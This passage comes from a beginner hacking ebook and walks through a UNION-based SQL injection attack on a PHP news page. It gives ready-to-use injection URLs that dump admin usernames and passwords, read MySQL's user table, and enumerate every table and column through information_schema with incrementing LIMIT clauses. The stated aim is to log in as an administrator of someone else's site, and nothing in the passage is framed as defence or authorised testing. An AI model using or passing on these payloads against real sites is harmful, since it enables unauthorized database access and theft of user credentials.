Hacking For Beginners – Manthan Desai
2010
http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58), password),3 from admin/* Now we get displayed username:password on screen, i.e. admin:admin or admin:somehash when you have this, youcan login like admin or some superuser if can't guess the right table name, you can always try mysql.user (default) ithas user i password columns, so example would be
http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password) ,3 from mysql.user/*
Step 6:- MySQL 5
Like I said before I’m going to explain how to get table and column names in MySQL > 5.
For this we need information_schema. It holds all tables and columns in database.To get tables we use table_name and information_schema.tables.i.e. http://www.site.com/news.php?id=5 union all select 1,table_name,3from information_schema.tables/* Here we replace the our number 2 with table_name to get the first table from information_schema.tablesdisplayed on the screen. Now we must add LIMIT to the end of query to list out all tables.i.e http://www.site.com/news.php?id=5 union all select 1,table_name,3from information_schema.tables limit 0,1/*
note that i put 0,1 (get 1 result starting from the 0th)now to view the second table, we change limit 0,1 to limit 1,1i.e http://www.site.com/news.php?id=5 union all select 1,table_name,3from information_schema.tables limit 1,1/* the second table is displayed.for third table we put limit 2,1i.e http://www.site.com/news.php?id=5 union all select 1,table_name,3from information_schema.tables limit 2,1/* keep incrementing until you get some like db_admin, poll_user, auth, auth_user etc... :DTo get the column names the method same.here we use column_name and information_schema.columnsthe method is same as above so example would be
http://www.site.com/news.php?id=5 union all select 1,column_name,3from information_schema.columns limit 0,1/* the first column is diplayed.the second one (we change limit 0,1 to limit 1,1)ie.http://www.site.com/news.php?id=5 union all select 1,column_name,3from information_schema.columns limit 1,1/*the second column is displayed, so keep incrementing until you get something likeusername,user,login, password, pass, passwd etc...if you wanna display column names for specific table use this query. (where clause)let's say that we found table users.i.ehttp://www.site.com/news.php?id=5 union all select 1,column_name,3from information_schema.columns where table_name='users'/*now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.Note that this won't work if the magic quotes is ON.let's say that we found colums user, pass and email.
www.hackingtech.co.tv
Page 149